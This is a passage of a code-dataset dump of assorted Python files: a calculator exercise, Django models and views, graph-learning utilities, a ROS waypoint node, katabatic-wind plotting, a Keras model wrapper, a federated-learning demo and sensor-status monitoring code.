editor')\napp.MainLoop()\n","sub_path":"wxpython/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"511695204","text":"\"\"\" Faça um programa que apresente um menu de opções para o cálculo das seguintes operações entre dois números:\n-> Adição(opção 1) -> Subtração(opção 2) -> Multiplicação(opção 3) -> Divisão(opção 4) -> Saída(opção 5).\nO programa deve possibilitar ao usuário a escolha da operação desejada a exibição do resultado e a volta do menu de\nopções. O programa só termina quando for escolhida a opção de saída.\"\"\"\n\nlista = ['Adição', 'Subtração', 'Multiplicação', 'Divisão', 'Encerrar o programa']\nwhile True:\n n1 = float(input('Informe o 1º número: '))\n n2 = float(input('Informe o 2º número: '))\n print('=' * 30)\n print(f'{\"Código\":<10}{\"Operações\":<20}')\n print('=' * 30)\n for indice, valores in enumerate(lista):\n print(f'{indice + 1:<10}{valores:<20}')\n while True:\n try:\n resposta = int(input('Qual o código da operação que deseja ? '))\n except ValueError:\n print('Escolha uma opção válida entre 1 e 5. Tente novamente.')\n continue\n else:\n break\n while resposta < 1 or resposta > 5:\n print('ERRO ! Escolha uma opção válida. Tente novamente.')\n resposta = int(input('Qual o código da operação que deseja ? '))\n if resposta == 1:\n print(f'A soma entre {n1} e {n2} é igual a {n1 + n2}')\n elif resposta == 2:\n print(f'A subtração entre {n1} e {n2} é igual a {n1 - n2}')\n elif resposta == 3:\n print(f'A multiplicação entre {n1} e {n2} é igual a {n1 * n2}')\n elif resposta == 4:\n try:\n divisao = n1 / n2\n except ZeroDivisionError:\n print('Não é possivel realizar uma divisão com o denominador valendo 0.')\n else:\n print(f'A divisão entre {n1} e {n2} é igual a {divisao}')\n else:\n print('Programa encerrado. Volte sempre !!')\n break\n","sub_path":"Seção 6 - Estruturas de repetição/ex047.py","file_name":"ex047.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"314851270","text":"from django.db import models\nfrom django.utils import timezone\n\n# Create your models here.\nclass Reserva(models.Model):\n\tnombre = models.CharField(max_length=50, help_text='ej. Sebastian Sanchez')\n\trut = models.CharField(max_length=12, help_text='ej. 20.468.488-K')\n\temail = models.EmailField(max_length=100, help_text='ej. seba.sanchezs@alumnos.duoc.cl')\n\tcelular = models.CharField(max_length=200, help_text='ej. +56966107950', null=True, blank=True)\n\tfecha = models.DateTimeField(max_length=16, help_text='ej. 2019-11-25 15:30', default=timezone.now)\n\tcomentarios = models.TextField(max_length=200,\n\t\thelp_text='ej. Mesa para 2 con vista al exterior')\n\n\tdef __str__(self):\n\t\treturn self.rut","sub_path":"celta/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"470230856","text":"import numpy as np\nimport scipy.sparse as sp\nimport torch\nfrom texttable import Texttable\nfrom collections import OrderedDict\n\n\ndef get_n_params(model):\n pp=0\n for p in list(model.parameters()):\n nn=1\n for s in list(p.size()):\n nn = nn*s\n pp += nn\n return pp\n\ndef args_print(args):\n _dict = vars(args)\n t = Texttable() \n t.add_row([\"Parameter\", \"Value\"])\n for k in _dict:\n t.add_row([k, _dict[k]])\n print(t.draw())\n\ndef dcg_at_k(r, k):\n r = np.asfarray(r)[:k]\n if r.size:\n return r[0] + np.sum(r[1:] / np.log2(np.arange(2, r.size + 1)))\n return 0.\n\ndef ndcg_at_k(r, k):\n dcg_max = dcg_at_k(sorted(r, reverse=True), k)\n if not dcg_max:\n return 0.\n return dcg_at_k(r, k) / dcg_max\n\n\ndef mean_reciprocal_rank(rs):\n rs = (np.asarray(r).nonzero()[0] for r in rs)\n return [1. / (r[0] + 1) if r.size else 0. for r in rs]\n\n\ndef normalize(mx):\n \"\"\"Row-normalize sparse matrix\"\"\"\n rowsum = np.array(mx.sum(1))\n if rowsum.min() == 0:\n rowsum = rowsum + 1\n r_inv = np.power(rowsum, -1).flatten()\n r_inv[np.isinf(r_inv)] = 0.\n r_mat_inv = sp.diags(r_inv)\n mx = r_mat_inv.dot(mx)\n return mx\n\n\ndef sparse_mx_to_torch_sparse_tensor(sparse_mx):\n \"\"\"Convert a scipy sparse matrix to a torch sparse tensor.\"\"\"\n sparse_mx = sparse_mx.tocoo().astype(np.float32)\n indices = torch.from_numpy(\n np.vstack((sparse_mx.row, sparse_mx.col)).astype(np.int64))\n values = torch.from_numpy(sparse_mx.data)\n shape = torch.Size(sparse_mx.shape)\n return torch.sparse.FloatTensor(indices, values, shape)\n\ndef randint():\n return np.random.randint(2**32 - 1)\n\n\n\ndef feature_OAG(layer_data, graph):\n feature = {}\n times = {}\n indxs = {}\n texts = []\n for _type in layer_data:\n if len(layer_data[_type]) == 0:\n continue\n idxs = np.array(list(layer_data[_type].keys()))\n tims = np.array(list(layer_data[_type].values()))[:,1]\n \n if 'node_emb' in graph.node_feature[_type]:\n feature[_type] = np.array(list(graph.node_feature[_type].loc[idxs, 'node_emb']), dtype=np.float)\n else:\n feature[_type] = np.zeros([len(idxs), 400])\n feature[_type] = np.concatenate((feature[_type], list(graph.node_feature[_type].loc[idxs, 'emb']),\\\n np.log10(np.array(list(graph.node_feature[_type].loc[idxs, 'citation'])).reshape(-1, 1) + 0.01)), axis=1)\n \n times[_type] = tims\n indxs[_type] = idxs\n \n if _type == 'paper':\n texts = np.array(list(graph.node_feature[_type].loc[idxs, 'title']), dtype=np.str)\n return feature, times, indxs, texts\n\n\ndef feature_MAG(layer_data, graph):\n feature = {}\n times = {}\n indxs = {}\n texts = []\n for _type in layer_data:\n if len(layer_data[_type]) == 0:\n continue\n idxs = np.array(list(layer_data[_type].keys()), dtype = np.int)\n tims = np.array(list(layer_data[_type].values()))[:,1]\n feature[_type] = graph.node_feature[_type][idxs]\n times[_type] = tims\n indxs[_type] = idxs\n \n return feature, times, indxs, texts","sub_path":"ogbn-mag/pyHGT/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"198786642","text":"#!/usr/bin/env python\n\nfrom copy import deepcopy\nimport math\nimport rospy\nfrom geometry_msgs.msg import PoseStamped, PoseArray\nfrom tf.transformations import euler_from_quaternion\ntry:\n from autoware_msgs.msg import Lane, Waypoint\nexcept Exception as e:\n print(\"Exception: \" + str(e))\n print(\"autoware_msgs is not in the PATH\")\n print(\"do\")\n print(\"source ~/Autoware/ros/install/local_setup.bash\")\n print(\"And try again\")\n exit(-1)\n\n\nclass RvizToWaypoints(object):\n def __init__(self):\n self.pub = rospy.Publisher('/final_waypoints',\n Lane,\n queue_size=1)\n self.sub = rospy.Subscriber('/move_base_simple/goal',\n PoseStamped,\n self._cb,\n queue_size=1)\n rospy.loginfo(\"Initialized\")\n\n self.pub_debug = rospy.Publisher(\n '/rviz_waypoints', PoseArray, queue_size=1)\n\n def _cb(self, msg):\n ln = Lane()\n wp = Waypoint()\n wp.pose = deepcopy(msg)\n wp.twist.twist.linear.x = 1.94\n # Make a pre-goal pose 0.5m before with 7km/h speed\n o = msg.pose.orientation\n _, _, yaw = euler_from_quaternion([o.x, o.y, o.z, o.w])\n wp.pose.pose.position.x -= (math.cos(yaw) * 0.5)\n wp.pose.pose.position.y -= (math.sin(yaw) * 0.5)\n # Add another point after with 0 speed to stop at the goal\n wp_stop = Waypoint()\n wp_stop.twist.twist.linear.x = 0.0\n wp_stop.pose = deepcopy(msg)\n ln.waypoints.append(wp)\n ln.waypoints.append(wp_stop)\n self.pub.publish(ln)\n rospy.loginfo(\"Published /final_waypoints\")\n\n pa = PoseArray()\n pa.header.frame_id = msg.header.frame_id\n pa.poses.append(wp.pose.pose)\n pa.poses.append(wp_stop.pose.pose)\n self.pub_debug.publish(pa)\n\n\nif __name__ == '__main__':\n rospy.init_node('rviz_waypoints')\n r = RvizToWaypoints()\n rospy.spin()\n","sub_path":"moving_hackathon_tools/scripts/rviz_goal_to_waypoints.py","file_name":"rviz_goal_to_waypoints.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"592645691","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 13 19:58:57 2018\n\n@author: michelle\n\"\"\"\n\n# ATOC 4500 Final Project\n# 29 November 2018\n\n# Plotting katabatic wind streamlines in the ASE\n\n# Idea: look at summers 2005-2006, 2006-2007, 2007-2008\n# Create climatology for 2001-2010 period\n\nimport numpy as np\nfrom netCDF4 import Dataset\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\n\nif __name__ == '__main__':\n\n # Reading in daily u10m\n df_u = Dataset(\"/users/michelle/Desktop/Fall 2018/ATOC 4500-001/Project/KNMI/u10m.KNMI-2001.ASE055.ERAIN.DD.nc\",'r')\n print (df_u.variables.keys())\n print (df_u.variables['rotated_pole'])\n\n lon = df_u.variables['lon'][:] # Lon, degrees east, shape (361,456) = (lat,lon)\n lat = df_u.variables['lat'][:] # Lat, degrees north, shape (361,456) = (lat,lon)\n rlon = df_u.variables['rlon'][:] # Lon in rotated pole grid, degrees, X axis, shape (456)\n rlat = df_u.variables['rlat'][:] # Lat in rotated pole grid, degrees, Y axis, shape (361)\n direc = df_u.variables['dir'][:] # Angle of rotation, degrees, (361,456)\n # Fill Value: 9.969209968386869e+36\n height = df_u.variables['height'][:] # Height above the surface, m, postive up, (1)\n time = df_u.variables['time'][:] # Time, days since 1979-01-01, shape (3652)\n # Start date yyyymmddhh = 2001010100; 2001, January 1, 1:00\n u10m = df_u.variables['u10m'][:] # Zonal wind speed, m/s, shape (3652,1,361,456) = (time,height,lat,lon)\n # 24-hr average of 3-hr instantaneous values, grid mapping = rotated pole, m s^-1\n # Fill value: -9999.0\n rotated_pole = df_u.variables['rotated_pole']\n \n # Reading in daily v10m\n df_v = Dataset(\"/users/michelle/Desktop/Fall 2018/ATOC 4500-001/Project/KNMI/v10m.KNMI-2001.ASE055.ERAIN.DD.nc\",'r')\n print(df_v.variables.keys())\n print(df_v.variables['v10m'])\n v10m = df_v.variables['v10m'] # Meridional wind speed, m/s, shape (3652,1,361,456) = (time,height,lat,lon)\n # 24-hr average of 3-hr instantaneous values, grid mapping = rotated pole, m s^-1\n # Fill value: -9999.0\n\n # ---- \n \n \n # 12/11/2018 - Create figures of wind vectors\n \n # Specifying u10m, v10m bounds\n u10m = u10m[:,0,:,:] # Gets rid of height dimension\n v10m = v10m[:,0,:,:]\n \n \n \n # Polar Stereographic Projection for Katabatic Winds at t=0\n # Set date\n u10m_t0 = u10m[0,:,:]\n v10m_t0 = v10m[0,:,:]\n \n fig = plt.figure(figsize = (8,6))\n m = Basemap(projection='stere',lat_0=-73,lon_0=-113,resolution='l',\\\n llcrnrlon=-130,urcrnrlon=-98,llcrnrlat=-76.5,urcrnrlat=-69)\n m.drawcoastlines()\n m.drawparallels(np.arange(-89.,-60.,3.), labels=[1,0,0,0],fontsize=10)\n m.drawmeridians(np.arange(-180.,181.,20.), labels=[0,0,0,1],fontsize=10)\n \n # Using meshgrid on lon and lat\n #x,y = np.meshgrid(lon[::20,::20], lat[::20,::20], sparse=True)\n x,y = np.meshgrid(lon[::6,::6], lat[::6,::6], sparse=True)\n xx,yy = m(x,y)\n \n # Plotting the vector field\n #m.quiver(x, y, -annual_mean_u10m[0,::7,::7], -annual_mean_v10m[0,::7,::7], width=0.002,scale=200)\n #m.quiver(xx, yy, -u10m_t0[::20,::20], -v10m_t0[::20,::20], width=0.002)\n m.quiver(xx, yy, u10m_t0[::6,::6], v10m_t0[::6,::6], width=0.002,scale=200)\n \n # Plot title\n plt.title(\"Katabatic Winds, 01-01-2001\")\n \n # Saving figure to file\n plt.savefig(\"/users/michelle/Desktop/Fall 2018/ATOC 4500-001/Project/KNMI/12-11_PIB_katabatic_t0.png\")\n plt.show()\n \n \n \n # ----\n \n # 12/11/2018 - (cont)\n \n # Create movie of Katabatic Winds for Dec 2001 - Feb 2002\n d0 = 8036 # Jan 1 2001\n # 6*31 + 28 + 4*30 = 186 + 28 + 120 = 334 (last day of Nov 2001)\n start_ind = 335 # time[335] == 8371\n # 31 + 31 + 28 = 90 (length of summer time period)\n end_ind = 424 # == 334 + 90, last day in February 2002\n \n inds = np.linspace(335,424,90)\n \n # Loop through each day in summer 2001-2002\n c = 0\n for ind in inds:\n ind = int(ind) # Needed to slice arrays below\n \n #if c==10:\n #break\n \n # Set dates\n u10m_ind = u10m[ind,:,:]\n v10m_ind = v10m[ind,:,:]\n \n # Make figure\n plt.close()\n fig = plt.figure(figsize = (8,6))\n m = Basemap(projection='stere',lat_0=-73,lon_0=-113,resolution='l',\\\n llcrnrlon=-130,urcrnrlon=-98,llcrnrlat=-76.5,urcrnrlat=-69)\n m.drawcoastlines()\n m.drawparallels(np.arange(-89.,-60.,3.), labels=[1,0,0,0],fontsize=10)\n m.drawmeridians(np.arange(-180.,181.,20.), labels=[0,0,0,1],fontsize=10)\n x,y = np.meshgrid(lon[::6,::6], lat[::6,::6], sparse=True)\n xx,yy = m(x,y)\n m.quiver(xx, yy, u10m_ind[::6,::6], v10m_ind[::6,::6], width=0.002,scale=200)\n plt.title(\"Katabatic Winds in Pine Island Bay\")\n plt.savefig(\"/users/michelle/Desktop/Fall 2018/ATOC 4500-001/Project/KNMI/video/12-11_PIB_katabatic_d\"+str(c)+\".png\")\n plt.show()\n \n c = c+1\n \n # ---- \n ","sub_path":"12-11-18_katabatic_vectorfield.py","file_name":"12-11-18_katabatic_vectorfield.py","file_ext":"py","file_size_in_byte":5122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"223036666","text":"import ipaddress\r\nfrom .hash import CuckooHash\r\n\r\nH = CuckooHash(20000)\r\n\r\n\r\ndef insert_to_hash(topology_map):\r\n for i in topology_map:\r\n H[i[0]] = i[1]\r\n\r\n\r\ndef is_ip_valid(address):\r\n \"\"\"\r\n If address is a valid IP network, return it as an ipaddress object,\r\n otherwise, return None\r\n \"\"\"\r\n\r\n try:\r\n return ipaddress.ip_interface(address)\r\n except ValueError:\r\n return None\r\n\r\ndef distance(ip1):\r\n list = []\r\n \r\n for i in H.keys():\r\n x = abs(int(is_ip_valid(ip1)) - int(is_ip_valid(i)))\r\n list.append(x)\r\n return list\r\n\r\ndef ip_range(ip_addr, topology_map):\r\n \"\"\"\r\n From list keys in hash table return finding value-key pair\r\n :param ip_addr : ip looks up\r\n :return:\r\n \"\"\"\r\n \r\n insert_to_hash(topology_map)\r\n \r\n for i in H.keys():\r\n if is_ip_valid(ip_addr) in ipaddress.ip_network(i, False):\r\n return H[i]\r\n else:\r\n m = min(distance(is_ip_valid(ip_addr)))\r\n index = distance(is_ip_valid(ip_addr)).index(m)\r\n return H[H.keys()[index]]\r\n","sub_path":"alternative-polaris/polaris_common/topology.py","file_name":"topology.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"192972859","text":"from __future__ import print_function\nfrom keras.models import Sequential\nfrom keras import layers\nfrom six.moves import range\n\n\nfrom common.model.training_effort_management import *\nfrom common.model.model_storage import *\n\nfrom common.misc.data_bender import *\nfrom common.misc.fileops import *\n\n\ndef model():\n\n # fn_setup_model = None # IN: input_size, label_size SIDE_EFFECT: save _model\n # fn_train_model = None # IN: num_of_iterations, Num_of_epochs, num_of_batches; SIDE_EFFECT: save and load _model\n # fn_train_on = None # IN: num_of_iterations SIDE_EFFECT: save and load _model\n # fn_stop_training = None #\n # fn_predict = None # IN: in_str; OUT: out_str\n\n _model = None\n _stop_running = False\n _x_train = None\n _y_train = None\n _x_val = None\n _y_val = None\n\n\n\n def fn_setup_model(inputs, labels):\n nonlocal _model\n nonlocal _x_train, _y_train, _x_val, _y_val\n _x_train, _x_val, _y_train, _y_val = data_breaker(inputs, labels)\n\n input_size = len(inputs[0])\n label_size = len(labels[0])\n\n HIDDEN_SIZE = 128\n # BATCH_SIZE = 128\n NUM_OF_HIDDEN_LAYERS = 1\n print('Build _model...')\n _model = Sequential()\n # \"Encode\" the input sequence using an RNN, producing an output of HIDDEN_SIZE.\n # Note: In a situation where your input sequences have a variable length,\n # use input_shape=(None, num_feature).\n _model.add(layers.LSTM(HIDDEN_SIZE, input_shape=(input_size, len(chars))))\n # As the decoder RNN's input, repeatedly provide with the last hidden state of\n # RNN for each time step. Repeat 'NUM_OF_DIGITS_IN_OPERAND + 1' times as that's the maximum\n # length of output, e.g., when NUM_OF_DIGITS_IN_OPERAND=3, max output is 999+999=1998.\n # _model.add(layers.RepeatVector(data_gen_dict['operand_size'] + 1))\n _model.add(layers.RepeatVector(label_size))\n # The decoder RNN could be multiple layers stacked or a single layer.\n for _ in range(NUM_OF_HIDDEN_LAYERS):\n # By setting return_sequences to True, return not only the last output but\n # all the outputs so far in the form of (num_samples, timesteps,\n # output_dim). This is necessary as TimeDistributed in the below expects\n # the first dimension to be the timesteps.\n _model.add(layers.LSTM(HIDDEN_SIZE, return_sequences=True))\n # Apply a dense layer to the every temporal slice of an input. For each of step\n # of the output sequence, decide which character should be chosen.\n _model.add(layers.TimeDistributed(layers.Dense(len(chars))))\n _model.add(layers.Activation('softmax'))\n fn_compile_model(_model)\n _model.summary()\n\n\n def fn_train_model(plugin_name, batch_size, num_of_iterations, num_of_epochs):\n\n nonlocal _model\n nonlocal _stop_running\n nonlocal _x_train, _y_train, _x_val, _y_val\n\n early_stopping_call_back = TrainingContinuationCallback(fn_stop_training)\n\n for iteration in range(0, num_of_iterations):\n if (_stop_running):\n break\n # pass\n print()\n print('-' * 50)\n print('Iteration', iteration)\n _model.fit(_x_train, _y_train,\n batch_size=batch_size,\n epochs=num_of_epochs,\n validation_data=( _x_val, _y_val),\n callbacks=[early_stopping_call_back],\n verbose=1)\n\n abs_model_path = get_abs_path('plugins/' + plugin_name + '/model_data/model')\n save_model(abs_model_path, _model)\n\n def fn_train_on():\n pass\n\n def fn_stop_training():\n nonlocal _stop_running\n _stop_running = True\n\n def fn_compile_model(model):\n model.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n def fn_predict(in_str):\n out_str = None\n return out_str\n\n\n\n\n\n\n return (fn_setup_model, fn_train_model, fn_train_on, fn_stop_training, fn_compile_model, fn_predict)","sub_path":"plugins/expr_calc/model_if.py","file_name":"model_if.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"552899740","text":"import datetime\nimport transaction\n\nfrom pyramid.view import view_config\n\nfrom sprox.formbase import AddRecordForm\n\nfrom .models import (\n DBSession,\n Movie,\n Genre,\n Director,\n)\n\n\nclass NewMovieForm(AddRecordForm):\n __model__ = Movie\n __dropdown_field_names__ = {'directors':'title'}\n\n\n@view_config(\n route_name='movies_new',\n renderer='demo:templates/new_movies.pt',\n)\ndef new_movies_view(request):\n new_movie_form = NewMovieForm(DBSession)\n values = dict(request.POST)\n if request.method == 'POST''':\n try:\n new_movie_form.validate(params=request.POST)\n request.session.flash('validated')\n del values['sprox_id']\n values['genre'] = DBSession.query(Genre).get(values['genre'])\n values['directors'] = DBSession.query(Director).filter(\n Director.id.in_(request.POST.getall('directors'))).all()\n values['release_date'] = datetime.datetime.strptime(\n values['release_date'], '%Y-%m-%d')\n movie = Movie(**values)\n request.session.flash('about to insert')\n with transaction.manager:\n DBSession.add(movie)\n request.session.flash(\"Movie \" + movie.title + \" inserted\")\n except Exception as e:\n request.session.flash(\"Something bad has happened \", str(e))\n return {\n 'form': new_movie_form,\n 'values': {},\n }\n","sub_path":"demo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"593586253","text":"from django.urls import path, re_path\nfrom django.contrib.auth.decorators import login_required\nfrom apps.ventas.views import lista, index,ProductoCreate, ProductoList, ProductoUpdate,ProductoDelete, ProductoAPi\n\nurlpatterns = [\n path ('',index, name='index'),\n path ('nuevo',login_required(ProductoCreate.as_view()), name='venta_crear'),\n path ('listar',login_required(ProductoList.as_view()), name='venta_listar'),\n re_path (r'^venta/update/(?P\\d+)/$',login_required(ProductoUpdate.as_view()), name='venta_editar'),\n re_path (r'^venta/delete/(?P\\d+)/$',login_required(ProductoDelete.as_view()), name='venta_eliminar'),\n path('listado',lista, name=\"listado\"),\n path('api',ProductoAPi.as_view(), name=\"api\"),\n\n\n\n]\n","sub_path":"apps/ventas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"293683636","text":"import nest_asyncio\nnest_asyncio.apply()\n\nimport collections\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_federated as tff\nfrom matplotlib import pyplot as plt\n\nnp.random.seed(0)\n\n\n# load a non-i.i.d Federated data\n# https://en.wikipedia.org/wiki/Independent_and_identically_distributed_random_variables\n\nemnist_train, emnist_test = tff.simulation.datasets.emnist.load_data()\n# print train data length\nprint(len(emnist_train.client_ids))\n\nprint(emnist_train.element_type_structure)\n\nexample_dataset = emnist_train.create_tf_dataset_for_client(\n emnist_train.client_ids[0]\n)\n\nexample_element = next(iter(example_dataset))\n\nprint(type(example_element['label']))\nprint(example_element['label'].numpy())\n\nplt.imshow(example_element['pixels'].numpy(), cmap='gray', aspect='equal')\nplt.grid(False)\n_ = plt.show()\n\n\n\n","sub_path":"image_classification/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"22687225","text":"import os\nimport shutil\nimport hashlib\nimport argparse\n\nfrom .common import load_backup, save_backup\n\n\ndef backup(package, target):\n\tpackage_backup_directory = os.path.join(os.environ['CONFILES_BACKUP'], package)\n\tpackage_backup = load_backup(package)\n\n\tif package_backup.get(target):\n\t\treturn\n\n\tprint(\"Backup original {}\".format(target))\n\n\tbackup_file = None\n\n\tif os.path.exists(target):\n\t\tif not os.path.exists(package_backup_directory):\n\t\t\tos.makedirs(package_backup_directory)\n\n\t\thash = hashlib.md5()\n\t\thash.update(target.encode('utf-8'))\n\t\tbackup_file = os.path.join(package_backup_directory, hash.hexdigest())\n\n\t\tshutil.copy2(target, backup_file)\n\n\tpackage_backup[target] = dict(type='file', value=backup_file)\n\n\tsave_backup(package, package_backup)\n\n\ndef parse_arguments():\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument('package', help='Name of the package')\n\tparser.add_argument('target', help='Target to backup')\n\n\treturn parser.parse_args()\n\nif __name__ == '__main__':\n\targs = parse_arguments()\n\tbackup(args.package, args.target)\n","sub_path":"confiles/package/helper/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"377923448","text":"import datetime, os, sys, math, time\nfrom datetime import timedelta\nfrom dateutil import parser\n\nif __name__ == '__main__': sys.path.append(\"..\")\nif __name__ == '__main__':\n from JuvoAPI import JuvoAPI\nelse:\n from sensor_mgmt.JuvoAPI import JuvoAPI\nfrom Entities.sysmon_log import Sysmon_Log\nfrom Entities.sensor_log import Sensor_Log\nfrom DAOs.connection_manager import connection_manager\nfrom DAOs.sensor_DAO import sensor_DAO\nfrom DAOs.sysmon_log_DAO import sysmon_log_DAO\nfrom DAOs.sensor_log_DAO import sensor_log_DAO\n\nclass Sensor_mgmt(object):\n\n # RETURN STATUS CODES\n INVALID_SENSOR = -1\n OK = 0 # Can be OK and LOW_BATT at the same time\n DISCONNECTED = 1\n LOW_BATT = 2\n CHECK_WARN = 3 # Potentially down\n\n # SETTINGS\n batt_thresh = 10 # percent\n motion_thresh = 3.5 # hours\n juvo_thresh = 50 # minutes >> Environment Stats >> Difference between reading and API availability\n\n\n @classmethod\n def get_sensor_status(cls, uuid, retBatteryLevel=False):\n '''\n Returns 'up' | 'down' status of sensors.\n For new sensors, Im assuming that at least a single record is sent and thus will trigger true.\n\n Inputs:\n uuid (str)\n retBatteryLevel (boolean)\n\n Return:\n 1. A List of status codes: See class variables\n 2. A list of Battery level\n - None if Juvo\n - Empty if no records found. e.g. Door sensors only send battery level logs when on low battery\n - Single value in %\n i.e. ([1,3], [75])\n i.e. ([1] , []) // Battery or newly installed sensor\n i.e. ([0] , [None]]) // Juvo\n '''\n # AREAS OF IMPROVEMENT\n # 1. Juvo Bed sensor: Warning triggered if no sleep in the past sleep period 9pm-9am. What about if sleep = 1sec? May also be a problem with elderly\n # - Maybe look at the breakdown period would be better >> light, deep, awake that kind of thing\n # 2. What if sensor partially breaks, sysmon sends, but no sensor logs? Dont think this can be detected also\n ret_codes = []\n batt_lvl = None\n\n curr_time = datetime.datetime.now()\n curr_time_m1d = curr_time - datetime.timedelta(days=1)\n\n try: sensor = sensor_DAO.get_sensors(uuid=uuid)[0]\n except IndexError:\n ret_codes.append(cls.INVALID_SENSOR)\n return ret_codes\n uuid = sensor.uuid\n type = sensor.type\n\n isDoor = True if type == \"door\" else False\n isMotion = True if type == \"motion\" else False\n isBed = True if type == \"bed sensor\" else False\n\n #LEGACY -- \"disconnected\" only exists in master students' data set. As this was thrown by gateway\n last_sysmons = sysmon_log_DAO.get_last_sysmon(uuid)\n if len(last_sysmons) > 0:\n if last_sysmons[0].key == \"disconnected\": ret_codes.append(cls.DISCONNECTED)\n\n if isDoor: # DOOR SENSOR\n # Check1: sensor update within 24 hours\n # we are assuming that the door closes at least once a day\n past24hrs_data = sensor_log_DAO.get_logs(uuid=uuid, start_datetime=curr_time_m1d, end_datetime=curr_time)\n if len(past24hrs_data) > 0: ret_codes.append(cls.CHECK_WARN)\n else: ret_codes.append(cls.OK)\n\n\n elif isMotion: # MOTION SENSOR\n last_batt = sysmon_log_DAO.get_last_battery_level(uuid=uuid)\n if last_batt != None:\n batt_update_period = (curr_time - last_batt.recieved_timestamp).total_seconds()\n\n # Check 1: hourly battery update. aeotec multisensor 6 should send battery level sysmon updates on the hour\n # This may just be Boon Thais' configs\n if batt_update_period > (60 * 60 * cls.motion_thresh): ret_codes.append(cls.CHECK_WARN)\n else: ret_codes.append(cls.OK)\n\n\n elif isBed: # BED SENSOR (JUVO)\n juvo = JuvoAPI()\n # Check 1: Sleep logged within past sleep period 9pm - 9am\n day_timebreak = curr_time.replace(hour=9, minute=0, second=0, microsecond=0)\n night_timebreak = curr_time.replace(hour=21, minute=0, second=0, microsecond=0)\n if curr_time > day_timebreak and curr_time < night_timebreak: # If current time is between 9am and 9pm\n sleeps = juvo.get_total_sleep_by_day(target=sensor.juvo_target, start_date=curr_time_m1d, end_date=curr_time_m1d)\n if len(sleeps) > 0: ret_codes.append(cls.OK) # sleep recorded\n else: ret_codes.append(cls.CHECK_WARN) # no sleep recorded\n\n else:\n ret_codes.append(cls.INVALID_SENSOR)\n\n # Check2: Battery level\n if isMotion or isDoor:\n last_batt = sysmon_log_DAO.get_last_battery_level(uuid=uuid)\n if last_batt != None: # Sysmon batt event found\n batt_lvl = last_batt.event\n if batt_lvl < cls.batt_thresh:\n ret_codes.append(cls.LOW_BATT)\n else: # No Sysmon batt event found, door sensor high batt, or newly installed sensor\n batt_lvl = []\n\n # Return Values\n if retBatteryLevel: return ret_codes, batt_lvl\n else: return ret_codes\n\n\n @classmethod\n def get_all_sensor_status(cls, retBatteryLevel=False):\n '''\n Returns 'up' | 'down' status of ALL sensors.\n\n Inputs:\n retBatteryLevel -- True, return battery level if exists. Default false\n\n Return:\n list of sensors, status codes, and optionally battery levels:\n NOTE: Battery level can be 'None' if no records are found\n\n [ [Sensor.Entity, [Status, Codes, battLVL]],\n [Sensor.Entity, [Status, Codes, None]]...\n ]\n\n See list of status codes\n '''\n # Ret list in form: [[uuid, [status codes], [uuid, [status codes]]]]\n sensor_status = []\n\n # List of all Sensors\n sensors = sensor_DAO.get_sensors()\n\n # Iterate all sensors and get statuss\n for sensor in sensors:\n uuid = sensor.uuid\n status = cls.get_sensor_status(uuid=uuid, retBatteryLevel=retBatteryLevel)\n if retBatteryLevel: sensor_status.append([uuid, status[0], status[1]])\n else: sensor_status.append([uuid, status])\n\n return sensor_status\n\n\n @classmethod\n def get_sensor_status_v2(cls, uuid, retBatteryLevel=False):\n '''\n Returns 'up' | 'down' status of sensors.\n For new sensors, Im assuming that at least a single record is sent and thus will trigger true.\n\n Inputs:\n uuid (str)\n retBatteryLevel (boolean)\n\n Return:\n 1. A List of status codes: See class variables\n 2. A list of Battery level\n - None if Juvo\n - Empty if no records found. e.g. Door sensors only send battery level logs when on low battery\n - Single value in %\n i.e. ([1,3], [75])\n i.e. ([1] , []) // Battery or newly installed sensor\n i.e. ([0] , [None]]) // Juvo\n '''\n # AREAS OF IMPROVEMENT\n # 1. Juvo Bed sensor: Warning triggered if no sleep in the past sleep period 9pm-9am. What about if sleep = 1sec? May also be a problem with elderly\n # - Maybe look at the breakdown period would be better >> light, deep, awake that kind of thing\n # 2. What if sensor partially breaks, sysmon sends, but no sensor logs? Dont think this can be detected also\n ret_codes = []\n batt_lvl = None\n\n curr_time = datetime.datetime.now()\n curr_time_m1d = curr_time - datetime.timedelta(days=1)\n\n try: sensor = sensor_DAO.get_sensors(uuid=uuid)[0]\n except IndexError:\n ret_codes.append(cls.INVALID_SENSOR)\n return ret_codes\n uuid = sensor.uuid\n type = sensor.type\n\n isDoor = True if type == 